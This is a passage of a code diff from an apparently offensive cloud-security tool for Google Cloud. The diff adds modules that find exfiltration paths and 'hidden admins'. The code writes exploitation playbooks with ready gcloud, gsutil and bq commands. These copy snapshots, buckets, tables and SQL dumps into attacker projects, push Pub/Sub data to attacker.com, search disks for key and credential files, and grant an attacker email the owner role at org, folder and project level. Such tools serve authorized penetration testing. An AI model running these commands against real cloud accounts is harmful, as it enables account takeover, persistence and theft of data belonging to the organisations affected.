Compute Snapshots\n\n") + sections.WriteString("These snapshots are publicly accessible and can be used to create disks in attacker-controlled projects.\n\n") + sections.WriteString("### Vulnerable Snapshots:\n") + for _, p := range publicSnapshots { + sections.WriteString(fmt.Sprintf("- %s in %s\n", p.ResourceName, p.ProjectID)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Create disk from public snapshot in attacker project\n") + sections.WriteString("gcloud compute disks create exfil-disk \\\n") + sections.WriteString(" --source-snapshot=projects/VICTIM_PROJECT/global/snapshots/SNAPSHOT_NAME \\\n") + sections.WriteString(" --zone=us-central1-a \\\n") + sections.WriteString(" --project=ATTACKER_PROJECT\n\n") + sections.WriteString("# Attach disk to instance\n") + sections.WriteString("gcloud compute instances attach-disk INSTANCE \\\n") + sections.WriteString(" --disk=exfil-disk --zone=us-central1-a\n\n") + sections.WriteString("# Mount and access data\n") + sections.WriteString("sudo mkdir /mnt/exfil && sudo mount /dev/sdb1 /mnt/exfil\n") + sections.WriteString("```\n\n") + } + + // Public Images + if len(publicImages) > 0 { + sections.WriteString("## Public Compute Images\n\n") + sections.WriteString("These images are publicly accessible and may contain sensitive data or credentials.\n\n") + sections.WriteString("### Vulnerable Images:\n") + for _, p := range publicImages { + sections.WriteString(fmt.Sprintf("- %s in %s\n", p.ResourceName, p.ProjectID)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Create instance from public image in attacker project\n") + sections.WriteString("gcloud compute instances create exfil-vm \\\n") + sections.WriteString(" --image=projects/VICTIM_PROJECT/global/images/IMAGE_NAME \\\n") + sections.WriteString(" --zone=us-central1-a \\\n") + sections.WriteString(" --project=ATTACKER_PROJECT\n\n") + sections.WriteString("# Access the instance and search for credentials\n") + sections.WriteString("gcloud compute ssh exfil-vm --zone=us-central1-a\n") + sections.WriteString("find / -name '*.pem' -o -name '*.key' -o -name 'credentials*' 2>/dev/null\n") + sections.WriteString("```\n\n") + } + + // Public Buckets + if len(publicBuckets) > 0 || len(allExports) > 0 { + sections.WriteString("## Public Storage Buckets\n\n") + sections.WriteString("These buckets are publicly accessible.\n\n") + sections.WriteString("### Vulnerable Buckets:\n") + for _, p := range publicBuckets { + sections.WriteString(fmt.Sprintf("- %s in %s\n", p.ResourceName, p.ProjectID)) + } + for _, e := range allExports { + if e.ResourceType == "bucket" { + sections.WriteString(fmt.Sprintf("- %s in %s (%s)\n", e.ResourceName, e.ProjectID, e.AccessLevel)) + } + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# List bucket contents\n") + sections.WriteString("gsutil ls -r gs://BUCKET_NAME/\n\n") + sections.WriteString("# Download all data\n") + sections.WriteString("gsutil -m cp -r gs://BUCKET_NAME/ ./exfil/\n\n") + sections.WriteString("# Search for sensitive files\n") + sections.WriteString("gsutil ls -r gs://BUCKET_NAME/ | grep -E '\\.(pem|key|json|env|config)$'\n") + sections.WriteString("```\n\n") + } + + // Logging Sinks + if len(loggingSinks) > 0 { + sections.WriteString("## Cross-Project Logging Sinks\n\n") + sections.WriteString("These logging sinks export logs to external destinations.\n\n") + sections.WriteString("### Identified Sinks:\n") + for _, p := range loggingSinks { + sections.WriteString(fmt.Sprintf("- %s -> %s\n", p.ResourceName, p.Destination)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Create logging sink to attacker-controlled destination\n") + sections.WriteString("gcloud logging sinks create exfil-sink \\\n") + sections.WriteString(" pubsub.googleapis.com/projects/ATTACKER_PROJECT/topics/exfil-logs \\\n") + sections.WriteString(" --log-filter='resource.type=\"gce_instance\"'\n\n") + sections.WriteString("# Export all audit logs\n") + sections.WriteString("gcloud logging sinks create audit-exfil \\\n") + sections.WriteString(" storage.googleapis.com/ATTACKER_BUCKET \\\n") + sections.WriteString(" --log-filter='protoPayload.@type=\"type.googleapis.com/google.cloud.audit.AuditLog\"'\n") + sections.WriteString("```\n\n") + } + + // Pub/Sub + if len(pubsubPaths) > 0 { + sections.WriteString("## Pub/Sub Exfiltration Paths\n\n") + sections.WriteString("These Pub/Sub configurations enable data exfiltration.\n\n") + sections.WriteString("### Identified Paths:\n") + for _, p := range pubsubPaths { + sections.WriteString(fmt.Sprintf("- %s -> %s\n", p.ResourceName, p.Destination)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Create push subscription to attacker endpoint\n") + sections.WriteString("gcloud pubsub subscriptions create exfil-sub \\\n") + sections.WriteString(" --topic=TOPIC_NAME \\\n") + sections.WriteString(" --push-endpoint=https://attacker.com/receive\n\n") + sections.WriteString("# Or create pull subscription and export\n") + sections.WriteString("gcloud pubsub subscriptions create exfil-pull --topic=TOPIC_NAME\n") + sections.WriteString("gcloud pubsub subscriptions pull exfil-pull --limit=1000 --auto-ack\n") + sections.WriteString("```\n\n") + } + + // BigQuery + if len(bqPaths) > 0 { + sections.WriteString("## BigQuery Data Exfiltration\n\n") + sections.WriteString("These BigQuery configurations enable data exfiltration.\n\n") + sections.WriteString("### Identified Paths:\n") + for _, p := range bqPaths { + sections.WriteString(fmt.Sprintf("- %s in %s\n", p.ResourceName, p.ProjectID)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Export table to GCS bucket (requires storage.objects.create)\n") + sections.WriteString("bq extract \\\n") + sections.WriteString(" --destination_format=NEWLINE_DELIMITED_JSON \\\n") + sections.WriteString(" 'PROJECT:DATASET.TABLE' \\\n") + sections.WriteString(" gs://ATTACKER_BUCKET/exfil/data-*.json\n\n") + sections.WriteString("# Query and save locally\n") + sections.WriteString("bq query --format=json 'SELECT * FROM PROJECT.DATASET.TABLE' > exfil.json\n\n") + sections.WriteString("# Copy dataset to attacker project\n") + sections.WriteString("bq cp PROJECT:DATASET.TABLE ATTACKER_PROJECT:EXFIL_DATASET.TABLE\n") + sections.WriteString("```\n\n") + } + + // Cloud SQL + if len(sqlPaths) > 0 { + sections.WriteString("## Cloud SQL Data Exfiltration\n\n") + sections.WriteString("These Cloud SQL instances have export capabilities.\n\n") + sections.WriteString("### Identified Instances:\n") + for _, p := range sqlPaths { + sections.WriteString(fmt.Sprintf("- %s in %s\n", p.ResourceName, p.ProjectID)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Export database to GCS\n") + sections.WriteString("gcloud sql export sql INSTANCE_NAME \\\n") + sections.WriteString(" gs://ATTACKER_BUCKET/exfil/dump.sql \\\n") + sections.WriteString(" --database=DATABASE_NAME\n\n") + sections.WriteString("# Export as CSV\n") + sections.WriteString("gcloud sql export csv INSTANCE_NAME \\\n") + sections.WriteString(" gs://ATTACKER_BUCKET/exfil/data.csv \\\n") + sections.WriteString(" --database=DATABASE_NAME \\\n") + sections.WriteString(" --query='SELECT * FROM sensitive_table'\n") + sections.WriteString("```\n\n") + } + + // Storage Transfer + if len(transferPaths) > 0 { + sections.WriteString("## Storage Transfer Service Exfiltration\n\n") + sections.WriteString("These storage transfer jobs export data to external destinations.\n\n") + sections.WriteString("### Identified Jobs:\n") + for _, p := range transferPaths { + sections.WriteString(fmt.Sprintf("- %s -> %s\n", p.ResourceName, p.Destination)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Create transfer job to external AWS S3\n") + sections.WriteString("gcloud transfer jobs create \\\n") + sections.WriteString(" gs://SOURCE_BUCKET \\\n") + sections.WriteString(" s3://attacker-bucket \\\n") + sections.WriteString(" --source-creds-file=gcs-creds.json\n") + sections.WriteString("```\n\n") + } + + // Permission-based exfil + if len(allPermPaths) > 0 { + sections.WriteString("## Permission-Based Exfiltration Capabilities\n\n") + sections.WriteString("These principals have permissions that enable data exfiltration.\n\n") + + // Group by category + categoryPaths := make(map[string][]PermissionBasedExfilPath) + for _, p := range allPermPaths { + categoryPaths[p.Category] = append(categoryPaths[p.Category], p) + } + + for category, paths := range categoryPaths { + sections.WriteString(fmt.Sprintf("### %s\n", category)) + for _, p := range paths { + sections.WriteString(fmt.Sprintf("- %s (%s) - %s\n", p.Principal, p.PrincipalType, p.Permission)) + } + sections.WriteString("\n") + } + } + + // Potential Vectors + if len(allVectors) > 0 { + sections.WriteString("## Potential Exfiltration Vectors\n\n") + sections.WriteString("These resources could be used for data exfiltration if compromised.\n\n") + + // Group by vector type + vectorTypes := make(map[string][]PotentialVector) + for _, v := range allVectors { + vectorTypes[v.VectorType] = append(vectorTypes[v.VectorType], v) + } + + for vType, vectors := range vectorTypes { + sections.WriteString(fmt.Sprintf("### %s\n", vType)) + for _, v := range vectors { + sections.WriteString(fmt.Sprintf("- %s in %s\n", v.ResourceName, v.ProjectID)) + } + sections.WriteString("\n") + } + } + + return sections.String() +} + func (m *DataExfiltrationModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { logger.InfoM(fmt.Sprintf("Analyzing exfiltration paths in project: %s", projectID), GCP_DATAEXFILTRATION_MODULE_NAME) @@ -1916,6 +2181,10 @@ func (m *DataExfiltrationModule) writeHierarchicalOutput(ctx context.Context, lo projectIDs[h.ProjectID] = true } + // Generate playbook once for all projects + playbook := m.generatePlaybook() + playbookAdded := false + for projectID := range projectIDs { // Ensure loot is initialized m.initializeLootForProject(projectID) @@ -1940,6 +2209,12 @@ func (m *DataExfiltrationModule) writeHierarchicalOutput(ctx context.Context, lo } } + // Add playbook to first project only (to avoid duplication) + if playbook != nil && playbook.Contents != "" && !playbookAdded { + lootFiles = append(lootFiles, *playbook) + playbookAdded = true + } + outputData.ProjectLevelData[projectID] = DataExfiltrationOutput{Table: tableFiles, Loot: lootFiles} } @@ -2007,6 +2282,12 @@ func (m *DataExfiltrationModule) writeFlatOutput(ctx context.Context, logger int } } + // Add playbook + playbook := m.generatePlaybook() + if playbook != nil && playbook.Contents != "" { + lootFiles = append(lootFiles, *playbook) + } + output := DataExfiltrationOutput{ Table: tables, Loot: lootFiles, diff --git a/gcp/commands/hiddenadmins.go b/gcp/commands/hiddenadmins.go new file mode 100644 index 00000000..aeb29bbb --- /dev/null +++ b/gcp/commands/hiddenadmins.go @@ -0,0 +1,870 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + iampb "cloud.google.com/go/iam/apiv1/iampb" + resourcemanager "cloud.google.com/go/resourcemanager/apiv3" + resourcemanagerpb "cloud.google.com/go/resourcemanager/apiv3/resourcemanagerpb" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + crmv1 "google.golang.org/api/cloudresourcemanager/v1" + "google.golang.org/api/iam/v1" + "google.golang.org/api/iterator" +) + +var GCPHiddenAdminsCommand = &cobra.Command{ + Use: globals.GCP_HIDDEN_ADMINS_MODULE_NAME, + Aliases: []string{"ha", "hidden"}, + Short: "Identify principals who can modify IAM policies (hidden admins)", + Long: `Analyze GCP IAM policies to identify principals who can modify IAM bindings. + +This module finds "hidden admins" - principals who may not have obvious admin roles +but possess permissions to grant themselves or others elevated access. + +Detected IAM modification capabilities: + +Organization Level: +- resourcemanager.organizations.setIamPolicy - Modify org-wide IAM +- iam.roles.create/update at org level - Create/modify org custom roles + +Folder Level: +- resourcemanager.folders.setIamPolicy - Modify folder IAM (affects all children) + +Project Level: +- resourcemanager.projects.setIamPolicy - Modify project IAM +- iam.roles.create/update - Create/modify project custom roles + +Service Account Level: +- iam.serviceAccounts.setIamPolicy - Grant SA access to others +- iam.serviceAccounts.create + setIamPolicy combo + +Resource Level IAM: +- storage.buckets.setIamPolicy - Modify bucket IAM +- bigquery.datasets.setIamPolicy - Modify dataset IAM +- pubsub.topics/subscriptions.setIamPolicy - Modify Pub/Sub IAM +- secretmanager.secrets.setIamPolicy - Modify secret IAM +- compute.instances.setIamPolicy - Modify instance IAM +- cloudfunctions.functions.setIamPolicy - Modify function IAM +- run.services.setIamPolicy - Modify Cloud Run IAM +- artifactregistry.repositories.setIamPolicy - Modify registry IAM`, + Run: runGCPHiddenAdminsCommand, +} + +// IAMModificationPermission represents a permission that allows IAM policy modification +type IAMModificationPermission struct { + Permission string + Category string + Description string +} + +// HiddenAdmin represents a principal with IAM modification capabilities +type HiddenAdmin struct { + Principal string + PrincipalType string + Permission string + Category string + Description string + ScopeType string // organization, folder, project, resource + ScopeID string + ScopeName string + ExploitCommand string +} + +type HiddenAdminsModule struct { + gcpinternal.BaseGCPModule + + AllAdmins []HiddenAdmin + OrgAdmins []HiddenAdmin + FolderAdmins []HiddenAdmin + ProjectAdmins map[string][]HiddenAdmin // projectID -> admins + ResourceAdmins []HiddenAdmin + + OrgIDs []string + OrgNames map[string]string + FolderNames map[string]string + + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +type HiddenAdminsOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o HiddenAdminsOutput) TableFiles() []internal.TableFile { return o.Table } +func (o HiddenAdminsOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPHiddenAdminsCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_HIDDEN_ADMINS_MODULE_NAME) + if err != nil { + return + } + + module := &HiddenAdminsModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + AllAdmins: []HiddenAdmin{}, + OrgAdmins: []HiddenAdmin{}, + FolderAdmins: []HiddenAdmin{}, + ProjectAdmins: make(map[string][]HiddenAdmin), + ResourceAdmins: []HiddenAdmin{}, + OrgIDs: []string{}, + OrgNames: make(map[string]string), + FolderNames: make(map[string]string), + LootMap: make(map[string]*internal.LootFile), + } + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// GetIAMModificationPermissions returns permissions that allow IAM policy modification +func GetIAMModificationPermissions() []IAMModificationPermission { + return []IAMModificationPermission{ + // Organization-level IAM + {Permission: "resourcemanager.organizations.setIamPolicy", Category: "Org IAM", Description: "Modify organization-wide IAM policy"}, + + // Folder-level IAM + {Permission: "resourcemanager.folders.setIamPolicy", Category: "Folder IAM", Description: "Modify folder IAM policy (affects all children)"}, + + // Project-level IAM + {Permission: "resourcemanager.projects.setIamPolicy", Category: "Project IAM", Description: "Modify project IAM policy"}, + + // Custom Role Management + {Permission: "iam.roles.create", Category: "Custom Roles", Description: "Create custom IAM roles"}, + {Permission: "iam.roles.update", Category: "Custom Roles", Description: "Modify custom IAM role permissions"}, + + // Service Account IAM + {Permission: "iam.serviceAccounts.setIamPolicy", Category: "SA IAM", Description: "Grant access to service accounts"}, + + // Org Policy (can disable security constraints) + {Permission: "orgpolicy.policy.set", Category: "Org Policy", Description: "Modify organization policies"}, + + // Resource-specific IAM + {Permission: "storage.buckets.setIamPolicy", Category: "Storage IAM", Description: "Modify bucket IAM policy"}, + {Permission: "bigquery.datasets.setIamPolicy", Category: "BigQuery IAM", Description: "Modify dataset IAM policy"}, + {Permission: "pubsub.topics.setIamPolicy", Category: "Pub/Sub IAM", Description: "Modify topic IAM policy"}, + {Permission: "pubsub.subscriptions.setIamPolicy", Category: "Pub/Sub IAM", Description: "Modify subscription IAM policy"}, + {Permission: "secretmanager.secrets.setIamPolicy", Category: "Secrets IAM", Description: "Modify secret IAM policy"}, + {Permission: "compute.instances.setIamPolicy", Category: "Compute IAM", Description: "Modify instance IAM policy"}, + {Permission: "compute.images.setIamPolicy", Category: "Compute IAM", Description: "Modify image IAM policy"}, + {Permission: "compute.snapshots.setIamPolicy", Category: "Compute IAM", Description: "Modify snapshot IAM policy"}, + {Permission: "cloudfunctions.functions.setIamPolicy", Category: "Functions IAM", Description: "Modify function IAM policy"}, + {Permission: "run.services.setIamPolicy", Category: "Cloud Run IAM", Description: "Modify Cloud Run service IAM policy"}, + {Permission: "artifactregistry.repositories.setIamPolicy", Category: "Artifact Registry IAM", Description: "Modify repository IAM policy"}, + {Permission: "cloudkms.cryptoKeys.setIamPolicy", Category: "KMS IAM", Description: "Modify KMS key IAM policy"}, + } +} + +func (m *HiddenAdminsModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Analyzing IAM policies to identify hidden admins...", globals.GCP_HIDDEN_ADMINS_MODULE_NAME) + + // Build permission map + permMap := make(map[string]IAMModificationPermission) + for _, p := range GetIAMModificationPermissions() { + permMap[p.Permission] = p + } + + // Analyze organization-level IAM + m.analyzeOrganizationIAM(ctx, logger, permMap) + + // Analyze folder-level IAM + m.analyzeFolderIAM(ctx, logger, permMap) + + // Analyze project-level IAM for each project + for _, projectID := range m.ProjectIDs { + m.analyzeProjectIAM(ctx, logger, projectID, permMap) + } + + // Generate loot (playbook) + m.generateLoot() + + if len(m.AllAdmins) == 0 { + logger.InfoM("No hidden admins found", globals.GCP_HIDDEN_ADMINS_MODULE_NAME) + return + } + + // Count by scope type + orgCount := len(m.OrgAdmins) + folderCount := len(m.FolderAdmins) + projectCount := 0 + for _, admins := range m.ProjectAdmins { + projectCount += len(admins) + } + resourceCount := len(m.ResourceAdmins) + + logger.SuccessM(fmt.Sprintf("Found %d hidden admin(s): %d org-level, %d folder-level, %d project-level, %d resource-level", + len(m.AllAdmins), orgCount, folderCount, projectCount, resourceCount), globals.GCP_HIDDEN_ADMINS_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +func (m *HiddenAdminsModule) analyzeOrganizationIAM(ctx context.Context, logger internal.Logger, permMap map[string]IAMModificationPermission) { + orgsClient, err := resourcemanager.NewOrganizationsClient(ctx) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + gcpinternal.HandleGCPError(err, logger, globals.GCP_HIDDEN_ADMINS_MODULE_NAME, "Could not create organizations client") + } + return + } + defer orgsClient.Close() + + // Get IAM service for role resolution + iamService, _ := m.getIAMService(ctx) + + searchReq := &resourcemanagerpb.SearchOrganizationsRequest{} + it := orgsClient.SearchOrganizations(ctx, searchReq) + for { + org, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + break + } + + orgID := strings.TrimPrefix(org.Name, "organizations/") + m.OrgNames[orgID] = org.DisplayName + m.OrgIDs = append(m.OrgIDs, orgID) + + policy, err := orgsClient.GetIamPolicy(ctx, &iampb.GetIamPolicyRequest{ + Resource: org.Name, + }) + if err != nil { + continue + } + + for _, binding := range policy.Bindings { + permissions := m.getRolePermissions(iamService, binding.Role, "") + for _, member := range binding.Members { + m.checkForHiddenAdmins(member, permissions, permMap, "organization", orgID, org.DisplayName) + } + } + } +} + +func (m *HiddenAdminsModule) analyzeFolderIAM(ctx context.Context, logger internal.Logger, permMap map[string]IAMModificationPermission) { + foldersClient, err := resourcemanager.NewFoldersClient(ctx) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + gcpinternal.HandleGCPError(err, logger, globals.GCP_HIDDEN_ADMINS_MODULE_NAME, "Could not create folders client") + } + return + } + defer foldersClient.Close() + + iamService, _ := m.getIAMService(ctx) + + searchReq := &resourcemanagerpb.SearchFoldersRequest{} + it := foldersClient.SearchFolders(ctx, searchReq) + for { + folder, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + break + } + + folderID := strings.TrimPrefix(folder.Name, "folders/") + m.FolderNames[folderID] = folder.DisplayName + + policy, err := foldersClient.GetIamPolicy(ctx, &iampb.GetIamPolicyRequest{ + Resource: folder.Name, + }) + if err != nil { + continue + } + + for _, binding := range policy.Bindings { + permissions := m.getRolePermissions(iamService, binding.Role, "") + for _, member := range binding.Members { + m.checkForHiddenAdmins(member, permissions, permMap, "folder", folderID, folder.DisplayName) + } + } + } +} + +func (m *HiddenAdminsModule) analyzeProjectIAM(ctx context.Context, logger internal.Logger, projectID string, permMap map[string]IAMModificationPermission) { + crmService, err := crmv1.NewService(ctx) + if err != nil { + return + } + + policy, err := crmService.Projects.GetIamPolicy(projectID, &crmv1.GetIamPolicyRequest{}).Do() + if err != nil { + return + } + + iamService, _ := m.getIAMService(ctx) + projectName := m.GetProjectName(projectID) + + for _, binding := range policy.Bindings { + if binding == nil { + continue + } + permissions := m.getRolePermissions(iamService, binding.Role, projectID) + for _, member := range binding.Members { + m.checkForHiddenAdmins(member, permissions, permMap, "project", projectID, projectName) + } + } +} + +func (m *HiddenAdminsModule) checkForHiddenAdmins(member string, permissions []string, permMap map[string]IAMModificationPermission, scopeType, scopeID, scopeName string) { + if member == "allUsers" || member == "allAuthenticatedUsers" { + return + } + + principalType := extractPrincipalType(member) + principal := extractPrincipalEmail(member) + + for _, perm := range permissions { + if iamPerm, ok := permMap[perm]; ok { + admin := HiddenAdmin{ + Principal: principal, + PrincipalType: principalType, + Permission: perm, + Category: iamPerm.Category, + Description: iamPerm.Description, + ScopeType: scopeType, + ScopeID: scopeID, + ScopeName: scopeName, + ExploitCommand: m.generateExploitCommand(perm, scopeType, scopeID), + } + + m.mu.Lock() + m.AllAdmins = append(m.AllAdmins, admin) + switch scopeType { + case "organization": + m.OrgAdmins = append(m.OrgAdmins, admin) + case "folder": + m.FolderAdmins = append(m.FolderAdmins, admin) + case "project": + m.ProjectAdmins[scopeID] = append(m.ProjectAdmins[scopeID], admin) + case "resource": + m.ResourceAdmins = append(m.ResourceAdmins, admin) + } + m.mu.Unlock() + } + } +} + +func (m *HiddenAdminsModule) generateExploitCommand(permission, scopeType, scopeID string) string { + switch permission { + case "resourcemanager.organizations.setIamPolicy": + return fmt.Sprintf("gcloud organizations add-iam-policy-binding %s --member='user:ATTACKER@example.com' --role='roles/owner'", scopeID) + case "resourcemanager.folders.setIamPolicy": + return fmt.Sprintf("gcloud resource-manager folders add-iam-policy-binding %s --member='user:ATTACKER@example.com' --role='roles/owner'", scopeID) + case "resourcemanager.projects.setIamPolicy": + return fmt.Sprintf("gcloud projects add-iam-policy-binding %s --member='user:ATTACKER@example.com' --role='roles/owner'", scopeID) + case "iam.roles.create": + return fmt.Sprintf("gcloud iam roles create customAdmin --project=%s --permissions=resourcemanager.projects.setIamPolicy", scopeID) + case "iam.roles.update": + return fmt.Sprintf("gcloud iam roles update ROLE_ID --project=%s --add-permissions=resourcemanager.projects.setIamPolicy", scopeID) + case "iam.serviceAccounts.setIamPolicy": + return fmt.Sprintf("gcloud iam service-accounts add-iam-policy-binding SA@%s.iam.gserviceaccount.com --member='user:ATTACKER@example.com' --role='roles/iam.serviceAccountTokenCreator'", scopeID) + case "orgpolicy.policy.set": + return "# Disable org policy constraints to bypass security controls" + case "storage.buckets.setIamPolicy": + return "gsutil iam ch user:ATTACKER@example.com:objectViewer gs://BUCKET_NAME" + case "bigquery.datasets.setIamPolicy": + return fmt.Sprintf("bq add-iam-policy-binding --member='user:ATTACKER@example.com' --role='roles/bigquery.dataViewer' %s:DATASET", scopeID) + default: + return fmt.Sprintf("# %s - refer to GCP documentation", permission) + } +} + +func (m *HiddenAdminsModule) getIAMService(ctx context.Context) (*iam.Service, error) { + return iam.NewService(ctx) +} + +func (m *HiddenAdminsModule) getRolePermissions(iamService *iam.Service, role string, projectID string) []string { + if iamService == nil { + return []string{} + } + + var roleInfo *iam.Role + var err error + + if strings.HasPrefix(role, "roles/") { + roleInfo, err = iamService.Roles.Get(role).Do() + } else if strings.HasPrefix(role, "projects/") { + roleInfo, err = iamService.Projects.Roles.Get(role).Do() + } else if strings.HasPrefix(role, "organizations/") { + roleInfo, err = iamService.Organizations.Roles.Get(role).Do() + } else { + roleInfo, err = iamService.Roles.Get("roles/" + role).Do() + } + + if err != nil { + return m.getKnownRolePermissions(role) + } + + return roleInfo.IncludedPermissions +} + +func (m *HiddenAdminsModule) getKnownRolePermissions(role string) []string { + knownRoles := map[string][]string{ + "roles/owner": { + "resourcemanager.projects.setIamPolicy", + "iam.serviceAccounts.setIamPolicy", + "iam.roles.create", + "iam.roles.update", + "storage.buckets.setIamPolicy", + "bigquery.datasets.setIamPolicy", + }, + "roles/resourcemanager.organizationAdmin": { + "resourcemanager.organizations.setIamPolicy", + }, + "roles/resourcemanager.folderAdmin": { + "resourcemanager.folders.setIamPolicy", + }, + "roles/resourcemanager.projectIamAdmin": { + "resourcemanager.projects.setIamPolicy", + }, + "roles/iam.securityAdmin": { + "resourcemanager.projects.setIamPolicy", + "iam.serviceAccounts.setIamPolicy", + }, + "roles/iam.serviceAccountAdmin": { + "iam.serviceAccounts.setIamPolicy", + }, + "roles/iam.roleAdmin": { + "iam.roles.create", + "iam.roles.update", + }, + } + + if perms, ok := knownRoles[role]; ok { + return perms + } + return []string{} +} + +func (m *HiddenAdminsModule) generateLoot() { + m.LootMap["hidden-admins-exploit-commands"] = &internal.LootFile{ + Name: "hidden-admins-exploit-commands", + Contents: "# GCP Hidden Admins - IAM Modification Exploit Commands\n# Generated by CloudFox\n\n", + } + + // Add entity-specific exploit commands + for _, admin := range m.AllAdmins { + m.addAdminToLoot(admin) + } + + // Add playbook + m.generatePlaybook() +} + +func (m *HiddenAdminsModule) addAdminToLoot(admin HiddenAdmin) { + lootFile := m.LootMap["hidden-admins-exploit-commands"] + if lootFile == nil { + return + } + + scopeInfo := fmt.Sprintf("%s: %s", admin.ScopeType, admin.ScopeName) + if admin.ScopeName == "" { + scopeInfo = fmt.Sprintf("%s: %s", admin.ScopeType, admin.ScopeID) + } + + lootFile.Contents += fmt.Sprintf( + "# Permission: %s\n"+ + "# Principal: %s (%s)\n"+ + "# Scope: %s\n"+ + "# Category: %s\n"+ + "%s\n\n", + admin.Permission, + admin.Principal, admin.PrincipalType, + scopeInfo, + admin.Category, + admin.ExploitCommand, + ) +} + +func (m *HiddenAdminsModule) generatePlaybook() { + m.LootMap["hidden-admins-playbook"] = &internal.LootFile{ + Name: "hidden-admins-playbook", + Contents: `# GCP Hidden Admins Exploitation Playbook +# Generated by CloudFox +# +# This playbook provides exploitation techniques for principals with IAM modification capabilities. + +` + m.generatePlaybookSections(), + } +} + +func (m *HiddenAdminsModule) generatePlaybookSections() string { + var sections strings.Builder + + // Group admins by permission category + categories := map[string][]HiddenAdmin{ + "Org IAM": {}, + "Folder IAM": {}, + "Project IAM": {}, + "Custom Roles": {}, + "SA IAM": {}, + "Org Policy": {}, + "Storage IAM": {}, + "BigQuery IAM": {}, + "Pub/Sub IAM": {}, + "Secrets IAM": {}, + "Compute IAM": {}, + "Functions IAM": {}, + "Cloud Run IAM": {}, + "Artifact Registry IAM": {}, + "KMS IAM": {}, + } + + for _, admin := range m.AllAdmins { + if _, ok := categories[admin.Category]; ok { + categories[admin.Category] = append(categories[admin.Category], admin) + } + } + + // Organization IAM Modification + if len(categories["Org IAM"]) > 0 { + sections.WriteString("## Organization IAM Modification\n\n") + sections.WriteString("Principals with organization-level IAM modification can grant any role to any principal across the entire organization.\n\n") + sections.WriteString("### Principals with this capability:\n") + for _, admin := range categories["Org IAM"] { + sections.WriteString(fmt.Sprintf("- %s (%s) at %s\n", admin.Principal, admin.PrincipalType, admin.ScopeName)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Grant yourself Owner role at org level\n") + sections.WriteString("gcloud organizations add-iam-policy-binding ORG_ID \\\n") + sections.WriteString(" --member='user:attacker@example.com' \\\n") + sections.WriteString(" --role='roles/owner'\n\n") + sections.WriteString("# Or grant more subtle roles for persistence\n") + sections.WriteString("gcloud organizations add-iam-policy-binding ORG_ID \\\n") + sections.WriteString(" --member='user:attacker@example.com' \\\n") + sections.WriteString(" --role='roles/iam.securityAdmin'\n") + sections.WriteString("```\n\n") + } + + // Folder IAM Modification + if len(categories["Folder IAM"]) > 0 { + sections.WriteString("## Folder IAM Modification\n\n") + sections.WriteString("Principals with folder-level IAM modification can grant roles affecting all projects in the folder hierarchy.\n\n") + sections.WriteString("### Principals with this capability:\n") + for _, admin := range categories["Folder IAM"] { + sections.WriteString(fmt.Sprintf("- %s (%s) at folder %s\n", admin.Principal, admin.PrincipalType, admin.ScopeName)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Grant yourself Editor role at folder level (affects all child projects)\n") + sections.WriteString("gcloud resource-manager folders add-iam-policy-binding FOLDER_ID \\\n") + sections.WriteString(" --member='user:attacker@example.com' \\\n") + sections.WriteString(" --role='roles/editor'\n") + sections.WriteString("```\n\n") + } + + // Project IAM Modification + if len(categories["Project IAM"]) > 0 { + sections.WriteString("## Project IAM Modification\n\n") + sections.WriteString("Principals with project-level IAM modification can grant any role within the project.\n\n") + sections.WriteString("### Principals with this capability:\n") + for _, admin := range categories["Project IAM"] { + sections.WriteString(fmt.Sprintf("- %s (%s) in project %s\n", admin.Principal, admin.PrincipalType, admin.ScopeName)) + } + sections.WriteString("\n### Exploitation:\n") + sections.WriteString("```bash\n") + sections.WriteString("# Grant yourself Owner role\n") + sections.WriteString("gcloud projects add-iam-policy-binding PROJECT_ID \\\n") + sections.WriteString(" --member='user:attacker@example.com' \\\n") + sections.WriteString(" --role='roles/owner'\n\n") + sections.WriteString("# Grant compute admin for instance access\n") + sections.WriteString("gcloud projects add-iam-policy-binding PROJECT_ID \\\n") + sections.WriteString(" --member='user:attacker@example.com' \\\n") + sections.WriteString(" --role='roles/compute.admin'\n") + sections.WriteString("```\n\n") + } + + // Custom Role Management + if len(categories["Custom Roles"]) > 0 { + sections.WriteString("## Custom Role Management\n\n") + sections.WriteString("Principals who can create or update custom roles can add dangerous permissions to existing roles or create new privileged roles.\n\n") + sections.WriteString("### Principals with this capability:\n") + for _, admin := range categories["Custom Roles"] { + sections.WriteString(fmt.Sprintf("- %s (%s) - %s in %s\n", admin.Principal, admin.PrincipalType, admin.Permission, admin.ScopeName)) + } + sections.WriteString("\n### Exploitation:\n") 